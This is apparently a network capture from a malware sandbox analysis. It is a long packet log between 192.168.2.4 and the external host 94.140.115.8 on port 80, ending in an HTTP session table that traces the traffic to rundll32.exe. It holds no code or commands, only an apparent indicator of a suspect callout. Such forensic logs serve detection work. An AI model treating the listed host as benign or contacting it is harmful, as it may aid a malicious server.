Apr 28, 2022 15:36:11.333525896 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333539963 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333579063 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333586931 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333616972 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333625078 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333656073 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333661079 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333683014 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333700895 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333746910 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333889961 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333930969 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333947897 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333970070 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333983898 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.334008932 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.334022045 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.334055901 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.334074974 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.334095955 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.334110022 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.334124088 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.334151983 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.334194899 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.344424963 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.344480991 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.344512939 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.344523907 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.344552994 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.344554901 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.344587088 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.344604969 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395009995 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395068884 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395109892 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395153046 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395190954 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395190001 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395231009 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395234108 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395262003 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395267963 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395308018 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395323038 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395803928 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395881891 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395906925 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395920038 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395947933 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395948887 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395988941 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.395988941 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.395998001 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.396029949 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.396051884 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.396070957 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.396095037 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.396096945 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.396138906 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.396152973 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.403139114 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.403198004 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.403223991 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.403239012 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.403266907 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.403280973 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.403301001 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.403331995 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458019972 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458168030 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458213091 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458242893 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458266020 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458316088 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458323002 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458357096 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458358049 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458395004 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458399057 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458435059 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458436012 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458475113 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458479881 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458512068 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458515882 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458542109 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458553076 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458581924 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458668947 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458708048 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458710909 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458746910 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458749056 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458775997 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.458791971 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.458816051 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.463852882 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.463875055 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.463891983 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.463907003 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.463933945 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.463985920 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.511620045 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511678934 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511703968 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511719942 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511743069 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511766911 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511796951 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511816025 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511840105 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511874914 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511898994 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511914968 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.511924028 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.511960983 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.511966944 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.511971951 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.512216091 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512239933 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512263060 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512279034 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512304068 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.512330055 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.512433052 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512458086 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512481928 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512497902 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.512522936 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.512587070 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.515275002 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515311003 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515341043 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515363932 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515396118 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515410900 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.515418053 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.515448093 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.515476942 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.602821112 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.697120905 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:12.062417984 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:12.062468052 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:12.062664032 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:37:06.649815083 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49763 | 94.140.115.8 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 28, 2022 15:36:09.408600092 CEST | 1198 | OUT | |
Apr 28, 2022 15:36:09.817040920 CEST | 1200 | IN |